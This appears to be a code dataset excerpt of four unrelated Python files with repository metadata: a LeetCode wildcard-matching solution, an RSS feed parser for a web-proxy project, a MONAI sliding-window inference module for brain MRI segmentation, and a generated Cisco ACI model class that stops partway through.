""" https://leetcode.com/problems/wildcard-matching/ Implement wildcard pattern matching with support for '?' and '*'. '?' Matches any single character. '*' Matches any sequence of characters (including the empty sequence). The matching should cover the entire input string (not partial). The function prototype should be: bool isMatch(const char *s, const char *p) Some examples: isMatch("aa","a") => false isMatch("aa","aa") => true isMatch("aaa","aa") => false isMatch("aa", "*") => true isMatch("aa", "a*") => true isMatch("ab", "?*") => true isMatch("aab", "c*a*b") => false """ """ ref: https://longwayjade.wordpress.com/2015/04/26/leetcode-recursion-dp-greedy-wildcard-matching/ O(p * s) where p and s are the lengths of the pattern and input strings. """ def is_match_2(s, p): i, j = 0, 0 asterick, match = -1, -1 """ asterick: once we found a star, we want to record the place of the star match: once we found a star, we want to start to match the rest of the pattern with the string, starting from the match position. This is for remembering the place where we need to start """ # we check and match every char in s while i < len(s): # we are not currently at '*'. s and p match or p == '?' if j < len(p) and (s[i] == p[j] or p[j] == '?'): i += 1 j += 1 # we are currently at a '*' elif j < len(p) and p[j] == '*': match = i asterick = j j += 1 # they do not match, we are not currently at '*' but the last match is '*' elif asterick >= 0: match += 1 i = match j = asterick + 1 # they do not match, we are not at '*' and last matched is not a '*', then the answer is false else: return False # when we finish matching all chars in s, is pattern also finished? 
we cound only allow '*' at the rest of pattern while j < len(p) and p[j] == '*': j += 1 return j == len(p) def is_match_1(s, p): return is_match_rec(s, p, 0, 0) def is_match_rec(text, pattern, i, j): if i == len(text) and j == len(pattern): return True if j < len(pattern) and pattern[j] == '*': while j < len(pattern) - 1 and pattern[j + 1] == '*': j += 1 for k in range(i, len(text) + 1): if is_match_rec(text, pattern, k, j + 1): return True # if k >= len(text): # return False # if pattern[j] != '*' and k != j: # return False return False elif i < len(text) and j < len(pattern) and\ (pattern[j] == '?' or pattern[j] == text[i]): return is_match_rec(text, pattern, i + 1, j + 1) return False def is_match(s, p): string = list(s) pattern = list(p) write_index = 0 is_first = True # replace multiple * with one * # e.g a**b***c --> a*b*c for i in range(len(pattern)): if pattern[i] == '*': if is_first: pattern[write_index] = pattern[i] write_index += 1 is_first = False else: pattern[write_index] = pattern[i] write_index += 1 is_first = True table = [[False for i in range(write_index + 1)] for j in range(len(s) + 1)] if write_index > 0 and pattern[0] == '*': table[0][1] = True table[0][0] = True for i in range(1, len(table)): # string for j in range(1, len(table[0])): # pattern if pattern[j -1] == '?' 
or string[i - 1] == pattern[j - 1]: table[i][j] = table[i - 1][j - 1] elif pattern[j - 1] == '*': table[i][j] = table[i - 1][j] or table[i][j - 1] # print table return table[-1][-1] # print is_match('xaylmz', 'x?y*z') # print is_match('aab', 'c*a*b') # print is_match('aaa','aa') # print is_match('aa', '*') # print is_match('aa','a') # print is_match('aa','aa') # print is_match('ab', '?*') # print is_match('aa', 'a*') # print is_match('', '') # print is_match('zacabz', '*a?b*') # print('\n') # print is_match_1('xaylmz', 'x?y*z') # print is_match_1('aab', 'c*a*b') # print is_match_1('aaa','aa') # print is_match_1('aa', '*') # print is_match_1('aa','a') # print is_match_1('aa','aa') # print is_match_1('ab', '?*') # print is_match_1('aa', 'a*') # print is_match_1('', '') # print is_match_1('zacabz', '*a?b*') # print is_match_1('babaaababaabababbbbbbaabaabbabababbaababbaaabbbaaab', '***bba**a*bbba**aab**b') # print('\n') print is_match_2('xaylmz', 'x?y*z') print is_match_2('aab', 'c*a*b') print is_match_2('aaa','aa') print is_match_2('aa', '*') print is_match_2('aa','a') print is_match_2('aa','aa') print is_match_2('ab', '?*') print is_match_2('aa', 'a*') print is_match_2('', '') print is_match_2('zacabz', '*a?b*') print is_match_2('babaaababaabababbbbbbaabaabbabababbaababbaaabbbaaab', '***bba**a*bbba**aab**b')
[ "albert.agram@gmail.com" ]
albert.agram@gmail.com
ef815d59dad6b7592dd1e4fd7515e8cce1897def
6189f34eff2831e3e727cd7c5e43bc5b591adffc
/WebMirror/management/rss_parser_funcs/feed_parse_extractMasterpasterWordpressCom.py
4f0f90aed8ef9c7ad57e152828a2279189a98583
[ "BSD-3-Clause" ]
permissive
fake-name/ReadableWebProxy
24603660b204a9e7965cfdd4a942ff62d7711e27
ca2e086818433abc08c014dd06bfd22d4985ea2a
refs/heads/master
2023-09-04T03:54:50.043051
2023-08-26T16:08:46
2023-08-26T16:08:46
39,611,770
207
20
BSD-3-Clause
2023-09-11T15:48:15
2015-07-24T04:30:43
Python
UTF-8
Python
false
false
647
py
def extractMasterpasterWordpressCom(item): ''' Parser for 'masterpaster.wordpress.com' ''' vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title']) if not (chp or vol) or "preview" in item['title'].lower(): return None tagmap = [ ('shinmai', 'Shinmai Maou no Keiyakusha', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel'), ] for tagname, name, tl_type in tagmap: if tagname in item['tags']: return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
[ "something@fake-url.com" ]
something@fake-url.com
bbdfd97c6d54ce1442ecff7b01a9b00e9c63b75a
8bb950ffb6036dc89e78d89cb5dd633d8878ab08
/Phys_Seg/predict_case.py
f89c8f5f57db5001dba2b8125cb781f206090803
[ "Apache-2.0" ]
permissive
pedrob37/Phys_Seg
0d8a2be4188cf9a33cce079a8c99da54acaafda6
7adc65d7b228b3a5702acfa9e6d0494d6b4c2dee
refs/heads/main
2023-07-31T06:46:02.617742
2021-10-01T17:53:09
2021-10-01T18:23:18
387,182,741
2
0
null
null
null
null
UTF-8
Python
false
false
11,857
py
import torch import numpy as np from typing import Callable, Union import torch.nn.functional as F from monai.data.utils import compute_importance_map, dense_patch_slices, get_valid_patch_size from monai.utils import BlendMode, PytorchPadMode, fall_back_tuple # def pad_patient_3D(patient, shape_must_be_divisible_by=16, min_size=None): # if not (isinstance(shape_must_be_divisible_by, list) or isinstance(shape_must_be_divisible_by, tuple)): # shape_must_be_divisible_by = [shape_must_be_divisible_by] * 3 # shp = patient.shape # new_shp = [shp[0] + shape_must_be_divisible_by[0] - shp[0] % shape_must_be_divisible_by[0], # shp[1] + shape_must_be_divisible_by[1] - shp[1] % shape_must_be_divisible_by[1], # shp[2] + shape_must_be_divisible_by[2] - shp[2] % shape_must_be_divisible_by[2]] # for i in range(len(shp)): # if shp[i] % shape_must_be_divisible_by[i] == 0: # new_shp[i] -= shape_must_be_divisible_by[i] # if min_size is not None: # new_shp = np.max(np.vstack((np.array(new_shp), np.array(min_size))), 0) # return reshape_by_padding_upper_coords(patient, new_shp, 0), shp # def reshape_by_padding_upper_coords(image, new_shape, pad_value=None): # shape = tuple(list(image.shape)) # new_shape = tuple(np.max(np.concatenate((shape, new_shape)).reshape((2,len(shape))), axis=0)) # if pad_value is None: # if len(shape) == 2: # pad_value = image[0,0] # elif len(shape) == 3: # pad_value = image[0, 0, 0] # else: # raise ValueError("Image must be either 2 or 3 dimensional") # res = np.ones(list(new_shape), dtype=image.dtype) * pad_value # if len(shape) == 2: # res[0:0+int(shape[0]), 0:0+int(shape[1])] = image # elif len(shape) == 3: # res[0:0+int(shape[0]), 0:0+int(shape[1]), 0:0+int(shape[2])] = image # return res def image_preprocessing(patient_data): if len(patient_data.shape) < 5: shape_mismatch = 5 - len(patient_data.shape) patient_data = patient_data[(*([None] * shape_mismatch), ...)] # patient_data = patient_data.clone() p_mean, p_std = patient_data.mean(), patient_data.std() 
patient_data = patient_data - p_mean patient_data = patient_data / p_std return patient_data def physics_preprocessing(physics_input, experiment_type): physics_input = torch.from_numpy(physics_input[None, :]) if experiment_type == 'MPRAGE': TI_physics = physics_input[:, 0] # print(physics_input.shape) TR_physics = physics_input[:, 0] + physics_input[:, 1] TI_expo_physics = torch.exp(-physics_input[:, 0]) TR_expo_physics = torch.exp(-physics_input[:, 0] - physics_input[:, 1]) overall_physics = torch.cat((torch.stack((TI_physics, TR_physics), dim=1), torch.stack((TI_expo_physics, TR_expo_physics), dim=1)), dim=1) elif experiment_type == 'SPGR': TR_expo_params = torch.unsqueeze(torch.exp(-physics_input[:, 0]), dim=1) TE_expo_params = torch.unsqueeze(torch.exp(-physics_input[:, 1]), dim=1) FA_sin_params = torch.unsqueeze(torch.sin(physics_input[:, 2] * 3.14159265 / 180), dim=1) overall_physics = torch.cat((physics_input, torch.stack((TR_expo_params, TE_expo_params, FA_sin_params), dim=1).squeeze()), dim=1) return overall_physics.float() def custom_sliding_window_inference( inputs: Union[torch.Tensor, tuple], roi_size, sw_batch_size: int, predictor: Callable, overlap: float = 0.25, mode: Union[BlendMode, str] = BlendMode.CONSTANT, padding_mode: Union[PytorchPadMode, str] = PytorchPadMode.CONSTANT, cval=0, uncertainty_flag=False, num_loss_passes=20 ): """ Sliding window inference on `inputs` with `predictor`. When roi_size is larger than the inputs' spatial size, the input image are padded during inference. To maintain the same spatial sizes, the output image will be cropped to the original input size. Args: inputs: input image to be processed (assuming NCHW[D]) roi_size (list, tuple): the spatial window size for inferences. When its components have None or non-positives, the corresponding inputs dimension will be used. if the components of the `roi_size` are non-positive values, the transform will use the corresponding components of img size. 
For example, `roi_size=(32, -1)` will be adapted to `(32, 64)` if the second spatial dimension size of img is `64`. sw_batch_size: the batch size to run window slices. predictor: given input tensor `patch_data` in shape NCHW[D], `predictor(patch_data)` should return a prediction with the same spatial shape and batch_size, i.e. NMHW[D]; where HW[D] represents the patch spatial size, M is the number of output channels, N is `sw_batch_size`. overlap: Amount of overlap between scans. mode: {``"constant"``, ``"gaussian"``} How to blend output of overlapping windows. Defaults to ``"constant"``. - ``"constant``": gives equal weight to all predictions. - ``"gaussian``": gives less weight to predictions on edges of windows. padding_mode: {``"constant"``, ``"reflect"``, ``"replicate"``, ``"circular"``} Padding mode when ``roi_size`` is larger than inputs. Defaults to ``"constant"`` See also: https://pytorch.org/docs/stable/nn.functional.html#pad cval: fill value for 'constant' padding mode. Default: 0 Raises: NotImplementedError: inputs must have batch_size=1. Note: - input must be channel-first and have a batch dim, support both spatial 2D and 3D. - currently only supports `inputs` with batch_size=1. """ assert 0 <= overlap < 1, "overlap must be >= 0 and < 1." 
# determine image spatial size and batch size # Note: all input images must have the same image size and batch size inputs_type = type(inputs) if inputs_type == tuple: phys_inputs = inputs[1] inputs = inputs[0] num_spatial_dims = len(inputs.shape) - 2 image_size_ = list(inputs.shape[2:]) batch_size = inputs.shape[0] # TODO: Enable batch sizes > 1 in future if batch_size > 1: raise NotImplementedError("inputs must have batch_size=1.") roi_size = fall_back_tuple(roi_size, image_size_) # in case that image size is smaller than roi size image_size = tuple(max(image_size_[i], roi_size[i]) for i in range(num_spatial_dims)) pad_size = [] for k in range(len(inputs.shape) - 1, 1, -1): diff = max(roi_size[k - 2] - inputs.shape[k], 0) half = diff // 2 pad_size.extend([half, diff - half]) inputs = F.pad(inputs, pad=pad_size, mode=PytorchPadMode(padding_mode).value, value=cval) scan_interval = _get_scan_interval(image_size, roi_size, num_spatial_dims, overlap) # Store all slices in list slices = dense_patch_slices(image_size, roi_size, scan_interval) # print(f'The slices are {slices}') slice_batches = [] for slice_index in range(0, len(slices), sw_batch_size): slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices))) input_slices = [] for curr_index in slice_index_range: curr_slice = slices[curr_index] if len(curr_slice) == 3: input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1], curr_slice[2]]) else: input_slices.append(inputs[0, :, curr_slice[0], curr_slice[1]]) slice_batches.append(torch.stack(input_slices)) # Perform predictions output_rois = list() for data in slice_batches: if not uncertainty_flag and inputs_type == tuple: seg_prob, _ = predictor(data, phys_inputs) # batched patch segmentation output_rois.append(seg_prob) elif inputs_type != tuple: seg_prob, _ = predictor(data) # batched patch segmentation output_rois.append(seg_prob) # stitching output image output_classes = output_rois[0].shape[1] output_shape = [batch_size, 
output_classes] + list(image_size) # Create importance map importance_map = compute_importance_map(get_valid_patch_size(image_size, roi_size), mode=mode, device=inputs.device) # allocate memory to store the full output and the count for overlapping parts output_image = torch.zeros(output_shape, dtype=torch.float32, device=inputs.device) count_map = torch.zeros(output_shape, dtype=torch.float32, device=inputs.device) for window_id, slice_index in enumerate(range(0, len(slices), sw_batch_size)): slice_index_range = range(slice_index, min(slice_index + sw_batch_size, len(slices))) # store the result in the proper location of the full output. Apply weights from importance map. for curr_index in slice_index_range: curr_slice = slices[curr_index] if len(curr_slice) == 3: # print(output_image.shape, curr_slice, importance_map.shape, output_rois[window_id].shape) output_image[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += ( importance_map * output_rois[window_id][curr_index - slice_index, :] ) count_map[0, :, curr_slice[0], curr_slice[1], curr_slice[2]] += importance_map else: output_image[0, :, curr_slice[0], curr_slice[1]] += ( importance_map * output_rois[window_id][curr_index - slice_index, :] ) count_map[0, :, curr_slice[0], curr_slice[1]] += importance_map # account for any overlapping sections output_image /= count_map if num_spatial_dims == 3: return output_image[ ..., pad_size[4]: image_size_[0] + pad_size[4], pad_size[2]: image_size_[1] + pad_size[2], pad_size[0]: image_size_[2] + pad_size[0], ] return output_image[ ..., pad_size[2]: image_size_[0] + pad_size[2], pad_size[0]: image_size_[1] + pad_size[0] ] # 2D def _get_scan_interval(image_size, roi_size, num_spatial_dims: int, overlap: float): assert len(image_size) == num_spatial_dims, "image coord different from spatial dims." assert len(roi_size) == num_spatial_dims, "roi coord different from spatial dims." 
scan_interval = [] for i in range(num_spatial_dims): if roi_size[i] == image_size[i]: scan_interval.append(int(roi_size[i])) else: # scan interval is (1-overlap)*roi_size scan_interval.append(int(roi_size[i] * (1 - overlap))) return tuple(scan_interval) def predict_phys_seg(net, patient_data, processed_physics, main_device): with torch.no_grad(): # Pass data to GPU if main_device == 'cpu': pass else: # tensor = torch.from_numpy(array) patient_data = torch.from_numpy(patient_data).float().cuda(main_device) # Basic to begin with: Just run with net! print(patient_data.shape, processed_physics.shape) if processed_physics is not None: out = custom_sliding_window_inference( (patient_data, processed_physics.cuda(main_device)), 160, 1, net, overlap=0.3, mode='gaussian') else: out = custom_sliding_window_inference(patient_data, 160, 1, net, overlap=0.3, mode='gaussian') # Softmax pred_seg = torch.softmax(out, dim=1) # Permute and cast to numpy pred_seg = pred_seg.squeeze().permute(1, 2, 3, 0).cpu().numpy() return pred_seg
[ "p.borges.17@ucl.ac.uk" ]
p.borges.17@ucl.ac.uk
9b1e420a0e4354604283ca8f209c4beef3dcbce4
3c000380cbb7e8deb6abf9c6f3e29e8e89784830
/venv/Lib/site-packages/cobra/modelimpl/fv/rttoepgforepgtoepgtask.py
eb38250be2a5a73454884d50578ab1d72c276477
[]
no_license
bkhoward/aciDOM
91b0406f00da7aac413a81c8db2129b4bfc5497b
f2674456ecb19cf7299ef0c5a0887560b8b315d0
refs/heads/master
2023-03-27T23:37:02.836904
2021-03-26T22:07:54
2021-03-26T22:07:54
351,855,399
0
0
null
null
null
null
UTF-8
Python
false
false
18,769
py
# coding=UTF-8 # ********************************************************************** # Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved # written by zen warriors, do not modify! # ********************************************************************** from cobra.mit.meta import ClassMeta from cobra.mit.meta import StatsClassMeta from cobra.mit.meta import CounterMeta from cobra.mit.meta import PropMeta from cobra.mit.meta import Category from cobra.mit.meta import SourceRelationMeta from cobra.mit.meta import NamedSourceRelationMeta from cobra.mit.meta import TargetRelationMeta from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory from cobra.model.category import MoCategory, PropCategory, CounterCategory from cobra.mit.mo import Mo # ################################################## class RtToEpgForEpgToEpgTask(Mo): """ Mo doc not defined in techpub!!! """ meta = ClassMeta("cobra.model.fv.RtToEpgForEpgToEpgTask") meta.moClassName = "fvRtToEpgForEpgToEpgTask" meta.rnFormat = "fvRtToEpgForEpgToEpgTask-%(id)s" meta.category = MoCategory.TASK meta.label = "None" meta.writeAccessMask = 0x1 meta.readAccessMask = 0x1 meta.isDomainable = False meta.isReadOnly = True meta.isConfigurable = False meta.isDeletable = False meta.isContextRoot = False meta.parentClasses.add("cobra.model.action.LicensemgrSubj") meta.parentClasses.add("cobra.model.action.StreamelemSubj") meta.parentClasses.add("cobra.model.action.ObserverSubj") meta.parentClasses.add("cobra.model.action.SnmpdSubj") meta.parentClasses.add("cobra.model.action.VmmmgrSubj") meta.parentClasses.add("cobra.model.action.AnalyticsSubj") meta.parentClasses.add("cobra.model.action.ScripthandlerSubj") meta.parentClasses.add("cobra.model.action.ConfelemSubj") meta.parentClasses.add("cobra.model.action.GoobserverelemSubj") meta.parentClasses.add("cobra.model.action.EventmgrSubj") meta.parentClasses.add("cobra.model.action.OspaelemSubj") meta.parentClasses.add("cobra.model.action.VtapSubj") 
meta.parentClasses.add("cobra.model.action.GohealthelemSubj") meta.parentClasses.add("cobra.model.action.OshSubj") meta.parentClasses.add("cobra.model.action.DhcpdSubj") meta.parentClasses.add("cobra.model.action.OpflexelemSubj") meta.parentClasses.add("cobra.model.action.DomainmgrSubj") meta.parentClasses.add("cobra.model.action.DbgrelemSubj") meta.parentClasses.add("cobra.model.action.CloudpeSubj") meta.parentClasses.add("cobra.model.action.PlgnhandlerSubj") meta.parentClasses.add("cobra.model.action.TopomgrSubj") meta.parentClasses.add("cobra.model.action.VleafelemSubj") meta.parentClasses.add("cobra.model.action.NxosmockSubj") meta.parentClasses.add("cobra.model.action.DbgrSubj") meta.parentClasses.add("cobra.model.action.PlatformmgrSubj") meta.parentClasses.add("cobra.model.action.AppliancedirectorSubj") meta.parentClasses.add("cobra.model.action.OpflexpSubj") meta.parentClasses.add("cobra.model.action.BootmgrSubj") meta.parentClasses.add("cobra.model.action.AeSubj") meta.parentClasses.add("cobra.model.action.GoeventelemSubj") meta.parentClasses.add("cobra.model.action.GoconnectorSubj") meta.parentClasses.add("cobra.model.action.PolicymgrSubj") meta.parentClasses.add("cobra.model.action.ExtXMLApiSubj") meta.parentClasses.add("cobra.model.action.ObserverelemSubj") meta.parentClasses.add("cobra.model.action.PolicyelemSubj") meta.parentClasses.add("cobra.model.action.PolicydistSubj") meta.parentClasses.add("cobra.model.action.IdmgrSubj") meta.parentClasses.add("cobra.model.action.EdmgrSubj") meta.superClasses.add("cobra.model.action.RInst") meta.superClasses.add("cobra.model.pol.ComplElem") meta.superClasses.add("cobra.model.task.Inst") meta.superClasses.add("cobra.model.action.Inst") meta.rnPrefixes = [ ('fvRtToEpgForEpgToEpgTask-', True), ] prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("deleteAll", "deleteall", 16384) 
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192) prop._addConstant("ignore", "ignore", 4096) meta.props.add("childAction", prop) prop = PropMeta("str", "data", "data", 52, PropCategory.REGULAR) prop.label = "Data" prop.isImplicit = True prop.isAdmin = True prop.range = [(0, 512)] meta.props.add("data", prop) prop = PropMeta("str", "descr", "descr", 33, PropCategory.REGULAR) prop.label = "Description" prop.isImplicit = True prop.isAdmin = True prop.range = [(0, 128)] prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+'] meta.props.add("descr", prop) prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN) prop.label = "None" prop.isDn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("dn", prop) prop = PropMeta("str", "endTs", "endTs", 15575, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("endTs", prop) prop = PropMeta("str", "fail", "fail", 46, PropCategory.REGULAR) prop.label = "Fail" prop.isImplicit = True prop.isAdmin = True meta.props.add("fail", prop) prop = PropMeta("str", "flags", "flags", 30392, PropCategory.REGULAR) prop.label = "Flags" prop.isImplicit = True prop.isAdmin = True meta.props.add("flags", prop) prop = PropMeta("str", "id", "id", 25948, PropCategory.REGULAR) prop.label = "ID" prop.isConfig = True prop.isAdmin = True prop.isCreateOnly = True prop.isNaming = True prop.defaultValue = 0 prop.defaultValueStr = "none" prop._addConstant("DbgacEpgForEpgToEpg", "dbgacepgforepgtoepg", 2267) prop._addConstant("none", "none", 0) meta.props.add("id", prop) prop = PropMeta("str", "invErrCode", "invErrCode", 49, PropCategory.REGULAR) prop.label = "Remote Error Code" prop.isImplicit = True prop.isAdmin = True prop._addConstant("ERR-FILTER-illegal-format", None, 1140) prop._addConstant("ERR-FSM-no-such-state", None, 1160) prop._addConstant("ERR-HTTP-set-error", 
None, 1551) prop._addConstant("ERR-HTTPS-set-error", None, 1552) prop._addConstant("ERR-MO-CONFIG-child-object-cant-be-configured", None, 1130) prop._addConstant("ERR-MO-META-no-such-object-class", None, 1122) prop._addConstant("ERR-MO-PROPERTY-no-such-property", None, 1121) prop._addConstant("ERR-MO-PROPERTY-value-out-of-range", None, 1120) prop._addConstant("ERR-MO-access-denied", None, 1170) prop._addConstant("ERR-MO-deletion-rule-violation", None, 1107) prop._addConstant("ERR-MO-duplicate-object", None, 1103) prop._addConstant("ERR-MO-illegal-containment", None, 1106) prop._addConstant("ERR-MO-illegal-creation", None, 1105) prop._addConstant("ERR-MO-illegal-iterator-state", None, 1100) prop._addConstant("ERR-MO-illegal-object-lifecycle-transition", None, 1101) prop._addConstant("ERR-MO-naming-rule-violation", None, 1104) prop._addConstant("ERR-MO-object-not-found", None, 1102) prop._addConstant("ERR-MO-resource-allocation", None, 1150) prop._addConstant("ERR-aaa-config-modify-error", None, 1520) prop._addConstant("ERR-acct-realm-set-error", None, 1513) prop._addConstant("ERR-add-ctrlr", None, 1574) prop._addConstant("ERR-admin-passwd-set", None, 1522) prop._addConstant("ERR-api", None, 1571) prop._addConstant("ERR-auth-issue", None, 1548) prop._addConstant("ERR-auth-realm-set-error", None, 1514) prop._addConstant("ERR-authentication", None, 1534) prop._addConstant("ERR-authorization-required", None, 1535) prop._addConstant("ERR-connect", None, 1572) prop._addConstant("ERR-create-domain", None, 1562) prop._addConstant("ERR-create-keyring", None, 1560) prop._addConstant("ERR-create-role", None, 1526) prop._addConstant("ERR-create-user", None, 1524) prop._addConstant("ERR-delete-domain", None, 1564) prop._addConstant("ERR-delete-role", None, 1528) prop._addConstant("ERR-delete-user", None, 1523) prop._addConstant("ERR-domain-set-error", None, 1561) prop._addConstant("ERR-http-initializing", None, 1549) prop._addConstant("ERR-incompat-ctrlr-version", None, 1568) 
prop._addConstant("ERR-internal-error", None, 1540) prop._addConstant("ERR-invalid-args", None, 1569) prop._addConstant("ERR-invalid-delimiter", None, 1589) prop._addConstant("ERR-invalid-domain", None, 1588) prop._addConstant("ERR-invalid-domain-name", None, 1582) prop._addConstant("ERR-ldap-delete-error", None, 1510) prop._addConstant("ERR-ldap-get-error", None, 1509) prop._addConstant("ERR-ldap-group-modify-error", None, 1518) prop._addConstant("ERR-ldap-group-set-error", None, 1502) prop._addConstant("ERR-ldap-set-error", None, 1511) prop._addConstant("ERR-missing-method", None, 1546) prop._addConstant("ERR-modify-ctrlr-access", None, 1567) prop._addConstant("ERR-modify-ctrlr-dvs-version", None, 1576) prop._addConstant("ERR-modify-ctrlr-rootcont", None, 1575) prop._addConstant("ERR-modify-ctrlr-scope", None, 1573) prop._addConstant("ERR-modify-ctrlr-trig-inventory", None, 1577) prop._addConstant("ERR-modify-domain", None, 1563) prop._addConstant("ERR-modify-domain-encapmode", None, 1581) prop._addConstant("ERR-modify-domain-enfpref", None, 1578) prop._addConstant("ERR-modify-domain-mcastpool", None, 1579) prop._addConstant("ERR-modify-domain-mode", None, 1580) prop._addConstant("ERR-modify-domain-prefencapmode", None, 1584) prop._addConstant("ERR-modify-role", None, 1527) prop._addConstant("ERR-modify-user", None, 1525) prop._addConstant("ERR-modify-user-domain", None, 1565) prop._addConstant("ERR-modify-user-role", None, 1532) prop._addConstant("ERR-no-buf", None, 1570) prop._addConstant("ERR-passwd-set-failure", None, 1566) prop._addConstant("ERR-provider-group-modify-error", None, 1519) prop._addConstant("ERR-provider-group-set-error", None, 1512) prop._addConstant("ERR-radius-global-set-error", None, 1505) prop._addConstant("ERR-radius-group-set-error", None, 1501) prop._addConstant("ERR-radius-set-error", None, 1504) prop._addConstant("ERR-request-timeout", None, 1545) prop._addConstant("ERR-role-set-error", None, 1515) 
prop._addConstant("ERR-rsa-global-set-error", None, 1587) prop._addConstant("ERR-rsa-group-set-error", None, 1585) prop._addConstant("ERR-rsa-set-error", None, 1586) prop._addConstant("ERR-secondary-node", None, 1550) prop._addConstant("ERR-service-not-ready", None, 1539) prop._addConstant("ERR-set-password-strength-check", None, 1543) prop._addConstant("ERR-store-pre-login-banner-msg", None, 1521) prop._addConstant("ERR-tacacs-enable-error", None, 1508) prop._addConstant("ERR-tacacs-global-set-error", None, 1507) prop._addConstant("ERR-tacacs-group-set-error", None, 1503) prop._addConstant("ERR-tacacs-set-error", None, 1506) prop._addConstant("ERR-user-account-expired", None, 1536) prop._addConstant("ERR-user-set-error", None, 1517) prop._addConstant("ERR-xml-parse-error", None, 1547) prop._addConstant("communication-error", "communication-error", 1) prop._addConstant("none", "none", 0) meta.props.add("invErrCode", prop) prop = PropMeta("str", "invErrDescr", "invErrDescr", 50, PropCategory.REGULAR) prop.label = "Remote Error Description" prop.isImplicit = True prop.isAdmin = True prop.range = [(0, 128)] prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+'] meta.props.add("invErrDescr", prop) prop = PropMeta("str", "invRslt", "invRslt", 48, PropCategory.REGULAR) prop.label = "Remote Result" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "not-applicable" prop._addConstant("capability-not-implemented-failure", "capability-not-implemented-failure", 16384) prop._addConstant("capability-not-implemented-ignore", "capability-not-implemented-ignore", 8192) prop._addConstant("capability-not-supported", "capability-not-supported", 32768) prop._addConstant("capability-unavailable", "capability-unavailable", 65536) prop._addConstant("end-point-failed", "end-point-failed", 32) prop._addConstant("end-point-protocol-error", "end-point-protocol-error", 64) prop._addConstant("end-point-unavailable", "end-point-unavailable", 16) 
prop._addConstant("extend-timeout", "extend-timeout", 134217728) prop._addConstant("failure", "failure", 1) prop._addConstant("fru-identity-indeterminate", "fru-identity-indeterminate", 4194304) prop._addConstant("fru-info-malformed", "fru-info-malformed", 8388608) prop._addConstant("fru-not-ready", "fru-not-ready", 67108864) prop._addConstant("fru-not-supported", "fru-not-supported", 536870912) prop._addConstant("fru-state-indeterminate", "fru-state-indeterminate", 33554432) prop._addConstant("fw-defect", "fw-defect", 256) prop._addConstant("hw-defect", "hw-defect", 512) prop._addConstant("illegal-fru", "illegal-fru", 16777216) prop._addConstant("intermittent-error", "intermittent-error", 1073741824) prop._addConstant("internal-error", "internal-error", 4) prop._addConstant("not-applicable", "not-applicable", 0) prop._addConstant("resource-capacity-exceeded", "resource-capacity-exceeded", 2048) prop._addConstant("resource-dependency", "resource-dependency", 4096) prop._addConstant("resource-unavailable", "resource-unavailable", 1024) prop._addConstant("service-not-implemented-fail", "service-not-implemented-fail", 262144) prop._addConstant("service-not-implemented-ignore", "service-not-implemented-ignore", 131072) prop._addConstant("service-not-supported", "service-not-supported", 524288) prop._addConstant("service-protocol-error", "service-protocol-error", 2097152) prop._addConstant("service-unavailable", "service-unavailable", 1048576) prop._addConstant("sw-defect", "sw-defect", 128) prop._addConstant("task-reset", "task-reset", 268435456) prop._addConstant("timeout", "timeout", 8) prop._addConstant("unidentified-fail", "unidentified-fail", 2) meta.props.add("invRslt", prop) prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "local" prop._addConstant("implicit", "implicit", 4) prop._addConstant("local", "local", 0) 
prop._addConstant("policy", "policy", 1) prop._addConstant("replica", "replica", 2) prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3) meta.props.add("lcOwn", prop) prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "never" prop._addConstant("never", "never", 0) meta.props.add("modTs", prop) prop = PropMeta("str", "oDn", "oDn", 51, PropCategory.REGULAR) prop.label = "Subject DN" prop.isImplicit = True prop.isAdmin = True meta.props.add("oDn", prop) prop = PropMeta("str", "operSt", "operSt", 15674, PropCategory.REGULAR) prop.label = "Completion" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = 0 prop.defaultValueStr = "scheduled" prop._addConstant("cancelled", "cancelled", 3) prop._addConstant("completed", "completed", 2) prop._addConstant("crashsuspect", "crash-suspect", 7) prop._addConstant("failed", "failed", 4) prop._addConstant("indeterminate", "indeterminate", 5) prop._addConstant("processing", "processing", 1) prop._addConstant("ready", "ready", 8) prop._addConstant("scheduled", "scheduled", 0) prop._addConstant("suspended", "suspended", 6) meta.props.add("operSt", prop) prop = PropMeta("str", "originMinority", "originMinority", 54, PropCategory.REGULAR) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop.defaultValue = False prop.defaultValueStr = "no" prop._addConstant("no", None, False) prop._addConstant("yes", None, True) meta.props.add("originMinority", prop) prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN) prop.label = "None" prop.isRn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("rn", prop) prop = PropMeta("str", "runId", "runId", 45, PropCategory.REGULAR) prop.label = "ID" prop.isImplicit = True prop.isAdmin = True meta.props.add("runId", prop) prop = PropMeta("str", "startTs", "startTs", 36, PropCategory.REGULAR) prop.label = "None" 
